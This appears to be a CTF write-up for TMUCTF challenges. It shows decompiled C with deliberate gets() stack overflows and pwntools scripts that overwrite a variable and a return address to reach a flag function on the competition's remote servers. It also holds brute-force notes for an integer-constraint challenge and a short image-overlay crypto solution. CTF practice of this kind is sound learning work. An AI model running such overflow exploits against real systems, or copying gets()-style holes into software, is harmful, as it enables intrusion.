int main(void) {
char name [28];
int local_c;
setbuf(stdout,(char *)0x0);
setbuf(stderr,(char *)0x0);
setbuf(stdin,(char *)0x0);
tmulogo();
local_c = 0;
puts("Hi, Please enter your name: ");
gets(name);
if (local_c == 0xcafe) {
helloUser(name);
}
return 0;
}
void helloUser(undefined8 param_1) {
char local_88 [128];
printf("Nice to meet you %s!\n",param_1);
puts("Tell me about yourself ;;)");
gets(local_88);
puts("It was a pleasure meeting you.");
return;
}
Solution
This is a common warmup problem that appears in CTF so I went through it easily. Well sort of. I grabbed some past code and found in the source what I am doing. I did everything right except it wasn't printing out the flag. Later on, another member looked over it and found that my address was completely wrong and that was a simple fix was all it took. The Code is below.
from pwn import *
import time
addr1 = 0xcafe
flag_os = 0x4012f0
payload = b"A" * 28
payload2 = b"A" * 128
newline = bytes('\n', 'utf-8')
#binary = process("./babypwn")
binary = remote('194.5.207.56', 7010)
print(binary.recvuntil(bytes("name:", "utf-8")))
binary.sendline(payload + p64(addr1))
# Makes it to Hello User
print(binary.recvuntil(bytes(")", "utf-8")))
# Get to here
binary.sendline(payload2 + p64(flag_os) + p64(flag_os))
binary.interactive()
Flag: TMUCTF{??????}
Are you admin [198 pts] [Not Solved]
Description
Just admin can get the flag! Note that the admin likes integers!
nc 194.5.207.113 7020, nc 185.97.117.19 7020
int main(void) {
int iVar1;
char local_128 [128];
char password [64];
char user [64];
FILE *local_28;
int num1;
int num2;
int num3;
int num4;
int num5;
setbuf(stdout,(char *)0x0);
setbuf(stderr,(char *)0x0);
setbuf(stdin,(char *)0x0);
tmulogo();
num5 = 0;
num4 = 0;
num3 = 0;
num2 = 0;
num1 = 0;
puts("Enter username:");
gets(user);
puts("Enter password:");
gets(password);
iVar1 = strcmp(user,"AlexTheUser");
if ((((iVar1 == 0) && (iVar1 = strcmp(password,"4l3x7h3p455w0rd"), iVar1 == 0)) &&
(num3 + num5 * num4 == 0x253f)) &&
(((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) &&
((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) {
local_28 = fopen("flag.txt","r");
if (local_28 == (FILE *)0x0) {
printf("Missing flag.txt. Contact an admin if you see this on remote.");
/* WARNING: Subroutine does not return */
exit(1);
}
fgets(local_128,0x80,local_28);
printf("%s",local_128);
}
return 0;
}
Solution
from pwn import *
user = bytes("AlexTheUser", "utf-8")
password = bytes("4l3x7h3p455w0rd", "utf-8")
#print(len(p64(flag_address)))
#binary = process("./areyouadmin")
#binary.close()
binary = remote("194.5.207.113", 7020)
print(binary.recvuntil(bytes("username:", "utf-8")))
binary.sendline(user)
print(binary.recvuntil(bytes("password:", "utf-8")))
binary.sendline(password)
#binary.sendline(payload + p64(flag_address))
#binary.interactive()
binary.close()
print("made it to the numbers")
"""
top = 233
found = False
i1 = 0
i4 = 0
i5 = 0
while not found:
for i2 in range(100, top):
for i3 in range(100, top):
i1 = (-1 * i3 * i2) + 0x16d3
i4 = (0x37a2 - i2) / i3
# Using New Known
i5 = (0x253f - i3) / i4
if (i5 + i2 * i1) == 0x1bc9:
print(i1, i2, i3, i4, i5)
if (i4 + i1 * i5) == 0x703f:
print(i1, i2, i3, i4, i5)
"""
# 233 30 187 76 123
"""
if (((num3 + num5 * num4 == 0x253f)) &&
(((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) &&
((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) {
"""
"""
top = 100
for i1 in range(0 , 100):
print(i1)
for i2 in range(0 , 10000):
for i3 in range(28, 32):
for i4 in range(90, 100):
for i5 in range(90, 100):
if (i3 + i5 * i4 == 9535):
if(i2 + i4 * i3 == 14242):
print(i2, i3, i4)
if(i1 + i3 * i2 == 5843):
if (i5 + i2 * i1 == 7113):
if (i4 + i1 * i5 == 28735):
print(i1, i2, i3, i4, i5)
"""
# Original Guess = 9535 14242 5843 7113 28735
#num1 + num3 * num2 == 0x16d3
#num3 + num5 * num4 == 0x253f
#num2 + num4 * num3 == 0x37a2
#num5 + num2 * num1 == 0x1bc9
#num4 + num1 * num5 == 0x703f
Welcome
Warmup [50 pts]
Description
A fun visual cryptography tool will amaze your kids!
Note: Remember the flag format is TMUCTF{...}.
Solution
Notice a small difference in the two file sizes. I was like hmmm let me see what would happen if I combine the images. I overlayed one on top of the other one and got the final image of the flag.